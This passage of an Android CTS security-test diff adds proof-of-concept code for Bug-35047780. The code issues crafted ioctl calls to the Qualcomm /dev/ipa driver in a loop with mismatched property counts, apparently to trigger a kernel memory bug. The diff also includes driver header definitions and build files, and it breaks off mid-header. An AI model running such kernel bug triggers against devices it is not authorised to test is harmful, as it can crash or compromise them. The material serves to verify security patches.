+ * @size: input parameter, size of table in bytes
+ * @offset: output parameter, offset into page in case of system memory
+ */
+struct ipa_ioc_nat_alloc_mem {
+ char dev_name[IPA_RESOURCE_NAME_MAX];
+ size_t size;
+ off_t offset;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_init - nat table initialization
+ * parameters
+ * @tbl_index: input parameter, index of the table
+ * @ipv4_rules_offset: input parameter, ipv4 rules address offset
+ * @expn_rules_offset: input parameter, ipv4 expansion rules address offset
+ * @index_offset: input parameter, index rules offset
+ * @index_expn_offset: input parameter, index expansion rules offset
+ * @table_entries: input parameter, ipv4 rules table size in entries
+ * @expn_table_entries: input parameter, ipv4 expansion rules table size
+ * @ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_init {
+ uint8_t tbl_index;
+ uint32_t ipv4_rules_offset;
+ uint32_t expn_rules_offset;
+
+ uint32_t index_offset;
+ uint32_t index_expn_offset;
+
+ uint16_t table_entries;
+ uint16_t expn_table_entries;
+ uint32_t ip_addr;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_del - nat table delete parameter
+ * @table_index: input parameter, index of the table
+ * @public_ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_del {
+ uint8_t table_index;
+ uint32_t public_ip_addr;
+};
+
+/**
+ * struct ipa_ioc_nat_dma_one - nat dma command parameter
+ * @table_index: input parameter, index of the table
+ * @base_addr: type of table, from which the base address of the table
+ * can be inferred
+ * @offset: destination offset within the NAT table
+ * @data: data to be written.
+ */
+struct ipa_ioc_nat_dma_one {
+ uint8_t table_index;
+ uint8_t base_addr;
+
+ uint32_t offset;
+ uint16_t data;
+
+};
+
+/**
+ * struct ipa_ioc_nat_dma_cmd - To hold multiple nat dma commands
+ * @entries: number of dma commands in use
+ * @dma: data pointer to the dma commands
+ */
+struct ipa_ioc_nat_dma_cmd {
+ uint8_t entries;
+ struct ipa_ioc_nat_dma_one dma[0];
+
+};
+
+/**
+ * struct ipa_msg_meta - Format of the message meta-data.
+ * @msg_type: the type of the message
+ * @rsvd: reserved bits for future use.
+ * @msg_len: the length of the message in bytes
+ *
+ * For push model:
+ * Client in user-space should issue a read on the device (/dev/ipa) with a
+ * sufficiently large buffer in a continuous loop, call will block when there is
+ * no message to read. Upon return, client can read the ipa_msg_meta from start
+ * of buffer to find out type and length of message
+ * size of buffer supplied >= (size of largest message + size of metadata)
+ *
+ * For pull model:
+ * Client in user-space can also issue a pull msg IOCTL to device (/dev/ipa)
+ * with a payload containing space for the ipa_msg_meta and the message specific
+ * payload length.
+ * size of buffer supplied == (len of specific message + size of metadata)
+ */
+struct ipa_msg_meta {
+ uint8_t msg_type;
+ uint8_t rsvd;
+ uint16_t msg_len;
+};
+
+/**
+ * struct ipa_wlan_msg - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @mac_addr: mac address of wlan client
+ *
+ * wlan drivers need to pass name of wlan iface and mac address of
+ * wlan client along with ipa_wlan_event, whenever a wlan client is
+ * connected/disconnected/moved to power save/come out of power save
+ */
+struct ipa_wlan_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+};
+
+/**
+ * enum ipa_wlan_hdr_attrib_type - attribute type
+ * in wlan client header
+ *
+ * WLAN_HDR_ATTRIB_MAC_ADDR: attrib type mac address
+ * WLAN_HDR_ATTRIB_STA_ID: attrib type station id
+ */
+enum ipa_wlan_hdr_attrib_type {
+ WLAN_HDR_ATTRIB_MAC_ADDR,
+ WLAN_HDR_ATTRIB_STA_ID
+};
+
+/**
+ * struct ipa_wlan_hdr_attrib_val - header attribute value
+ * @attrib_type: type of attribute
+ * @offset: offset of attribute within header
+ * @u.mac_addr: mac address
+ * @u.sta_id: station id
+ */
+struct ipa_wlan_hdr_attrib_val {
+ enum ipa_wlan_hdr_attrib_type attrib_type;
+ uint8_t offset;
+ union {
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+ uint8_t sta_id;
+ } u;
+};
+
+/**
+ * struct ipa_wlan_msg_ex - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @num_of_attribs: number of attributes
+ * @attrib_val: holds attribute values
+ *
+ * wlan drivers need to pass name of wlan iface and mac address
+ * of wlan client or station id along with ipa_wlan_event,
+ * whenever a wlan client is connected/disconnected/moved to
+ * power save/come out of power save
+ */
+struct ipa_wlan_msg_ex {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_of_attribs;
+ struct ipa_wlan_hdr_attrib_val attribs[0];
+};
+
+struct ipa_ecm_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ int ifindex;
+};
+
+/**
+ * struct ipa_wan_msg - To hold information about wan client
+ * @name: name of the wan interface
+ *
+ * CnE need to pass the name of default wan iface when connected/disconnected.
+ * netmgr need to pass the name of wan eMBMS iface when connected.
+ */
+struct ipa_wan_msg {
+ char upstream_ifname[IPA_RESOURCE_NAME_MAX];
+ char tethered_ifname[IPA_RESOURCE_NAME_MAX];
+ enum ipa_ip_type ip;
+};
+
+/**
+ * struct ipa_ioc_rm_dependency - parameters for add/delete dependency
+ * @resource_name: name of dependent resource
+ * @depends_on_name: name of its dependency
+ */
+struct ipa_ioc_rm_dependency {
+ enum ipa_rm_resource_name resource_name;
+ enum ipa_rm_resource_name depends_on_name;
+};
+
+struct ipa_ioc_generate_flt_eq {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+};
+
+/**
+ * struct ipa_ioc_write_qmapid - to write mux id to endpoint meta register
+ * @mux_id: mux id of wan
+ */
+struct ipa_ioc_write_qmapid {
+ enum ipa_client_type client;
+ uint8_t qmap_id;
+};
+
+enum ipacm_client_enum {
+ IPACM_CLIENT_USB = 1,
+ IPACM_CLIENT_WLAN,
+ IPACM_CLIENT_MAX
+};
+/**
+ * actual IOCTLs supported by IPA driver
+ */
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR, \
+ struct ipa_ioc_add_hdr *)
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR, \
+ struct ipa_ioc_del_hdr *)
+#define IPA_IOC_ADD_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE, \
+ struct ipa_ioc_add_rt_rule *)
+#define IPA_IOC_ADD_RT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE_AFTER, \
+ struct ipa_ioc_add_rt_rule_after *)
+#define IPA_IOC_DEL_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_RT_RULE, \
+ struct ipa_ioc_del_rt_rule *)
+#define IPA_IOC_ADD_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE, \
+ struct ipa_ioc_add_flt_rule *)
+#define IPA_IOC_ADD_FLT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE_AFTER, \
+ struct ipa_ioc_add_flt_rule_after *)
+#define IPA_IOC_DEL_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_FLT_RULE, \
+ struct ipa_ioc_del_flt_rule *)
+#define IPA_IOC_COMMIT_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_COMMIT_HDR)
+#define IPA_IOC_RESET_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_RESET_HDR)
+#define IPA_IOC_COMMIT_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_COMMIT_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_DUMP _IO(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DUMP)
+#define IPA_IOC_GET_RT_TBL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_RT_TBL, \
+ struct ipa_ioc_get_rt_tbl *)
+#define IPA_IOC_PUT_RT_TBL _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_RT_TBL, \
+ uint32_t)
+#define IPA_IOC_COPY_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COPY_HDR, \
+ struct ipa_ioc_copy_hdr *)
+#define IPA_IOC_QUERY_INTF _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF, \
+ struct ipa_ioc_query_intf *)
+#define IPA_IOC_QUERY_INTF_TX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_TX_PROPS, \
+ struct ipa_ioc_query_intf_tx_props *)
+#define IPA_IOC_QUERY_INTF_RX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_RX_PROPS, \
+ struct ipa_ioc_query_intf_rx_props *)
+#define IPA_IOC_QUERY_INTF_EXT_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_EXT_PROPS, \
+ struct ipa_ioc_query_intf_ext_props *)
+#define IPA_IOC_GET_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HDR, \
+ struct ipa_ioc_get_hdr *)
+#define IPA_IOC_PUT_HDR _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_HDR, \
+ uint32_t)
+#define IPA_IOC_ALLOC_NAT_MEM _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ALLOC_NAT_MEM, \
+ struct ipa_ioc_nat_alloc_mem *)
+#define IPA_IOC_V4_INIT_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_INIT_NAT, \
+ struct ipa_ioc_v4_nat_init *)
+#define IPA_IOC_NAT_DMA _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NAT_DMA, \
+ struct ipa_ioc_nat_dma_cmd *)
+#define IPA_IOC_V4_DEL_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_DEL_NAT, \
+ struct ipa_ioc_v4_nat_del *)
+#define IPA_IOC_GET_NAT_OFFSET _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_NAT_OFFSET, \
+ uint32_t *)
+#define IPA_IOC_SET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_SET_FLT, \
+ uint32_t)
+#define IPA_IOC_PULL_MSG _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PULL_MSG, \
+ struct ipa_msg_meta *)
+#define IPA_IOC_RM_ADD_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_ADD_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_RM_DEL_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_DEL_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_GENERATE_FLT_EQ _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GENERATE_FLT_EQ, \
+ struct ipa_ioc_generate_flt_eq *)
+#define IPA_IOC_QUERY_EP_MAPPING _IOR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_EP_MAPPING, \
+ uint32_t)
+#define IPA_IOC_QUERY_RT_TBL_INDEX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_RT_TBL_INDEX, \
+ struct ipa_ioc_get_rt_tbl_indx *)
+#define IPA_IOC_WRITE_QMAPID _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_WRITE_QMAPID, \
+ struct ipa_ioc_write_qmapid *)
+#define IPA_IOC_MDFY_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_FLT_RULE, \
+ struct ipa_ioc_mdfy_flt_rule *)
+#define IPA_IOC_MDFY_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_RT_RULE, \
+ struct ipa_ioc_mdfy_rt_rule *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_ADD _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD, \
+ struct ipa_wan_msg *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_DEL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_NOTIFY_WAN_EMBMS_CONNECTED _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_ADD_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR_PROC_CTX, \
+ struct ipa_ioc_add_hdr_proc_ctx *)
+#define IPA_IOC_DEL_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR_PROC_CTX, \
+ struct ipa_ioc_del_hdr_proc_ctx *)
+
+#define IPA_IOC_GET_HW_VERSION _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HW_VERSION, \
+ enum ipa_hw_type *)
+
+/*
+ * unique magic number of the Tethering bridge ioctls
+ */
+#define TETH_BRIDGE_IOC_MAGIC 0xCE
+
+/*
+ * Ioctls supported by Tethering bridge driver
+ */
+#define TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE 0
+#define TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS 1
+#define TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS 2
+#define TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES 3
+#define TETH_BRIDGE_IOCTL_MAX 4
+
+
+/**
+ * enum teth_link_protocol_type - link protocol (IP / Ethernet)
+ */
+enum teth_link_protocol_type {
+ TETH_LINK_PROTOCOL_IP,
+ TETH_LINK_PROTOCOL_ETHERNET,
+ TETH_LINK_PROTOCOL_MAX,
+};
+
+/**
+ * enum teth_aggr_protocol_type - Aggregation protocol (MBIM / TLP)
+ */
+enum teth_aggr_protocol_type {
+ TETH_AGGR_PROTOCOL_NONE,
+ TETH_AGGR_PROTOCOL_MBIM,
+ TETH_AGGR_PROTOCOL_TLP,
+ TETH_AGGR_PROTOCOL_MAX,
+};
+
+/**
+ * struct teth_aggr_params_link - Aggregation parameters for uplink/downlink
+ * @aggr_prot: Aggregation protocol (MBIM / TLP)
+ * @max_transfer_size_byte: Maximal size of aggregated packet in bytes.
+ * Default value is 16*1024.
+ * @max_datagrams: Maximal number of IP packets in an aggregated
+ * packet. Default value is 16
+ */
+struct teth_aggr_params_link {
+ enum teth_aggr_protocol_type aggr_prot;
+ uint32_t max_transfer_size_byte;
+ uint32_t max_datagrams;
+};
+
+
+/**
+ * struct teth_aggr_params - Aggregation parmeters
+ * @ul: Uplink parameters
+ * @dl: Downlink parmaeters
+ */
+struct teth_aggr_params {
+ struct teth_aggr_params_link ul;
+ struct teth_aggr_params_link dl;
+};
+
+/**
+ * struct teth_aggr_capabilities - Aggregation capabilities
+ * @num_protocols: Number of protocols described in the array
+ * @prot_caps[]: Array of aggregation capabilities per protocol
+ */
+struct teth_aggr_capabilities {
+ uint16_t num_protocols;
+ struct teth_aggr_params_link prot_caps[0];
+};
+
+/**
+ * struct teth_ioc_set_bridge_mode
+ * @link_protocol: link protocol (IP / Ethernet)
+ * @lcid: logical channel number
+ */
+struct teth_ioc_set_bridge_mode {
+ enum teth_link_protocol_type link_protocol;
+ uint16_t lcid;
+};
+
+/**
+ * struct teth_ioc_set_aggr_params
+ * @aggr_params: Aggregation parmeters
+ * @lcid: logical channel number
+ */
+struct teth_ioc_aggr_params {
+ struct teth_aggr_params aggr_params;
+ uint16_t lcid;
+};
+
+
+#define TETH_BRIDGE_IOC_SET_BRIDGE_MODE _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE, \
+ struct teth_ioc_set_bridge_mode *)
+#define TETH_BRIDGE_IOC_SET_AGGR_PARAMS _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_PARAMS _IOR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_CAPABILITIES _IOWR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES, \
+ struct teth_aggr_capabilities *)
+
+/*
+ * unique magic number of the ODU bridge ioctls
+ */
+#define ODU_BRIDGE_IOC_MAGIC 0xCD
+
+/*
+ * Ioctls supported by ODU bridge driver
+ */
+#define ODU_BRIDGE_IOCTL_SET_MODE 0
+#define ODU_BRIDGE_IOCTL_SET_LLV6_ADDR 1
+#define ODU_BRIDGE_IOCTL_MAX 2
+
+/**
+ * enum odu_bridge_mode - bridge mode
+ * (ROUTER MODE / BRIDGE MODE)
+ */
+enum odu_bridge_mode {
+ ODU_BRIDGE_MODE_ROUTER,
+ ODU_BRIDGE_MODE_BRIDGE,
+ ODU_BRIDGE_MODE_MAX,
+};
+
+#define ODU_BRIDGE_IOC_SET_MODE _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_MODE, \
+ enum odu_bridge_mode)
+
+#define ODU_BRIDGE_IOC_SET_LLV6_ADDR _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_LLV6_ADDR, \
+ struct in6_addr *)
+
+#endif /* _UAPI_MSM_IPA_H_ */
diff --git a/hostsidetests/security/securityPatch/Bug-35047780/poc.cpp b/hostsidetests/security/securityPatch/Bug-35047780/poc.cpp
new file mode 100644
index 0000000..f036943
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047780/poc.cpp
@@ -0,0 +1,65 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions
+ * and limitations under the License.
+ **/
+
+
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include "local_poc.h"
+#include <unistd.h>
+#include <stdio.h>
+
+struct ipa_ioc_query_intf_ext_props_2 {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[23];
+};
+
+int main() {
+
+ int fd = open("/dev/ipa", O_RDWR);
+
+ struct ipa_ioc_query_intf query_intf;
+ strlcpy(&(query_intf.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+
+ int result = ioctl(fd, IPA_IOC_QUERY_INTF, &query_intf);
+
+ ipa_ioc_query_intf_ext_props_2 ext_props_2;
+ memset(&ext_props_2, 0, sizeof(ext_props_2));
+ strlcpy(&(ext_props_2.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ ext_props_2.num_ext_props = 23;
+
+ int result2 = ioctl(fd, IPA_IOC_QUERY_INTF_EXT_PROPS, &ext_props_2);
+
+ while (true) {
+ ipa_ioc_query_intf_ext_props ext_props;
+ memset(&ext_props, 0, sizeof(ext_props));
+ strlcpy(&(ext_props.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ ext_props.num_ext_props = 0;
+
+ int result3 = ioctl(fd, IPA_IOC_QUERY_INTF_EXT_PROPS, &ext_props);
+ usleep(10000);
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-35048450/Android.mk b/hostsidetests/security/securityPatch/Bug-35048450/Android.mk
new file mode 100644
index 0000000..ea9dd89
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35048450/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35048450
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35048450/local_poc.h b/hostsidetests/security/securityPatch/Bug-35048450/local_poc.h
new file mode 100644
index 0000000..889018d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35048450/local_poc.h
@@ -0,0 +1,1759 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+*/
+
+#ifndef _UAPI_MSM_IPA_H_
+#define _UAPI_MSM_IPA_H_
+
+#ifndef __KERNEL__
+#include <stdint.h>
+#include <stddef.h>
+#include <sys/stat.h>
+#endif
+#include <linux/ioctl.h>
+#include <linux/types.h>
+#include <linux/if_ether.h>
+
+/**
+ * unique magic number of the IPA device
+ */
+#define IPA_IOC_MAGIC 0xCF
+
+/**
+ * name of the default routing tables for v4 and v6
+ */
+#define IPA_DFLT_RT_TBL_NAME "ipa_dflt_rt"
+
+/**
+ * the commands supported by IPA driver
+ */
+#define IPA_IOCTL_ADD_HDR 0
+#define IPA_IOCTL_DEL_HDR 1
+#define IPA_IOCTL_ADD_RT_RULE 2
+#define IPA_IOCTL_DEL_RT_RULE 3
+#define IPA_IOCTL_ADD_FLT_RULE 4
+#define IPA_IOCTL_DEL_FLT_RULE 5
+#define IPA_IOCTL_COMMIT_HDR 6
+#define IPA_IOCTL_RESET_HDR 7
+#define IPA_IOCTL_COMMIT_RT 8
+#define IPA_IOCTL_RESET_RT 9
+#define IPA_IOCTL_COMMIT_FLT 10
+#define IPA_IOCTL_RESET_FLT 11
+#define IPA_IOCTL_DUMP 12
+#define IPA_IOCTL_GET_RT_TBL 13
+#define IPA_IOCTL_PUT_RT_TBL 14
+#define IPA_IOCTL_COPY_HDR 15
+#define IPA_IOCTL_QUERY_INTF 16
+#define IPA_IOCTL_QUERY_INTF_TX_PROPS 17
+#define IPA_IOCTL_QUERY_INTF_RX_PROPS 18
+#define IPA_IOCTL_GET_HDR 19
+#define IPA_IOCTL_PUT_HDR 20
+#define IPA_IOCTL_SET_FLT 21
+#define IPA_IOCTL_ALLOC_NAT_MEM 22
+#define IPA_IOCTL_V4_INIT_NAT 23
+#define IPA_IOCTL_NAT_DMA 24
+#define IPA_IOCTL_V4_DEL_NAT 26
+#define IPA_IOCTL_PULL_MSG 27
+#define IPA_IOCTL_GET_NAT_OFFSET 28
+#define IPA_IOCTL_RM_ADD_DEPENDENCY 29
+#define IPA_IOCTL_RM_DEL_DEPENDENCY 30
+#define IPA_IOCTL_GENERATE_FLT_EQ 31
+#define IPA_IOCTL_QUERY_INTF_EXT_PROPS 32
+#define IPA_IOCTL_QUERY_EP_MAPPING 33
+#define IPA_IOCTL_QUERY_RT_TBL_INDEX 34
+#define IPA_IOCTL_WRITE_QMAPID 35
+#define IPA_IOCTL_MDFY_FLT_RULE 36
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD 37
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL 38
+#define IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED 39
+#define IPA_IOCTL_ADD_HDR_PROC_CTX 40
+#define IPA_IOCTL_DEL_HDR_PROC_CTX 41
+#define IPA_IOCTL_MDFY_RT_RULE 42
+#define IPA_IOCTL_ADD_RT_RULE_AFTER 43
+#define IPA_IOCTL_ADD_FLT_RULE_AFTER 44
+#define IPA_IOCTL_GET_HW_VERSION 45
+#define IPA_IOCTL_MAX 46
+
+/**
+ * max size of the header to be inserted
+ */
+#define IPA_HDR_MAX_SIZE 64
+
+/**
+ * max size of the name of the resource (routing table, header)
+ */
+#define IPA_RESOURCE_NAME_MAX 32
+
+/**
+ * max number of interface properties
+ */
+#define IPA_NUM_PROPS_MAX 35
+
+/**
+ * size of the mac address
+ */
+#define IPA_MAC_ADDR_SIZE 6
+
+/**
+ * max number of mbim streams
+ */
+#define IPA_MBIM_MAX_STREAM_NUM 8
+
+/**
+ * the attributes of the rule (routing or filtering)
+ */
+#define IPA_FLT_TOS (1ul << 0)
+#define IPA_FLT_PROTOCOL (1ul << 1)
+#define IPA_FLT_SRC_ADDR (1ul << 2)
+#define IPA_FLT_DST_ADDR (1ul << 3)
+#define IPA_FLT_SRC_PORT_RANGE (1ul << 4)
+#define IPA_FLT_DST_PORT_RANGE (1ul << 5)
+#define IPA_FLT_TYPE (1ul << 6)
+#define IPA_FLT_CODE (1ul << 7)
+#define IPA_FLT_SPI (1ul << 8)
+#define IPA_FLT_SRC_PORT (1ul << 9)
+#define IPA_FLT_DST_PORT (1ul << 10)
+#define IPA_FLT_TC (1ul << 11)
+#define IPA_FLT_FLOW_LABEL (1ul << 12)
+#define IPA_FLT_NEXT_HDR (1ul << 13)
+#define IPA_FLT_META_DATA (1ul << 14)
+#define IPA_FLT_FRAGMENT (1ul << 15)
+#define IPA_FLT_TOS_MASKED (1ul << 16)
+#define IPA_FLT_MAC_SRC_ADDR_ETHER_II (1ul << 17)
+#define IPA_FLT_MAC_DST_ADDR_ETHER_II (1ul << 18)
+#define IPA_FLT_MAC_SRC_ADDR_802_3 (1ul << 19)
+#define IPA_FLT_MAC_DST_ADDR_802_3 (1ul << 20)
+#define IPA_FLT_MAC_ETHER_TYPE (1ul << 21)
+
+/**
+ * enum ipa_client_type - names for the various IPA "clients"
+ * these are from the perspective of the clients, for e.g.
+ * HSIC1_PROD means HSIC client is the producer and IPA is the
+ * consumer
+ */
+enum ipa_client_type {
+ IPA_CLIENT_PROD,
+ IPA_CLIENT_HSIC1_PROD = IPA_CLIENT_PROD,
+ IPA_CLIENT_WLAN1_PROD,
+ IPA_CLIENT_HSIC2_PROD,
+ IPA_CLIENT_USB2_PROD,
+ IPA_CLIENT_HSIC3_PROD,
+ IPA_CLIENT_USB3_PROD,
+ IPA_CLIENT_HSIC4_PROD,
+ IPA_CLIENT_USB4_PROD,
+ IPA_CLIENT_HSIC5_PROD,
+ IPA_CLIENT_USB_PROD,
+ IPA_CLIENT_A5_WLAN_AMPDU_PROD,
+ IPA_CLIENT_A2_EMBEDDED_PROD,
+ IPA_CLIENT_A2_TETHERED_PROD,
+ IPA_CLIENT_APPS_LAN_WAN_PROD,
+ IPA_CLIENT_APPS_CMD_PROD,
+ IPA_CLIENT_ODU_PROD,
+ IPA_CLIENT_MHI_PROD,
+ IPA_CLIENT_Q6_LAN_PROD,
+ IPA_CLIENT_Q6_WAN_PROD,
+ IPA_CLIENT_Q6_CMD_PROD,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_PROD,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD,
+ IPA_CLIENT_Q6_DECOMP_PROD,
+ IPA_CLIENT_Q6_DECOMP2_PROD,
+ IPA_CLIENT_UC_USB_PROD,
+
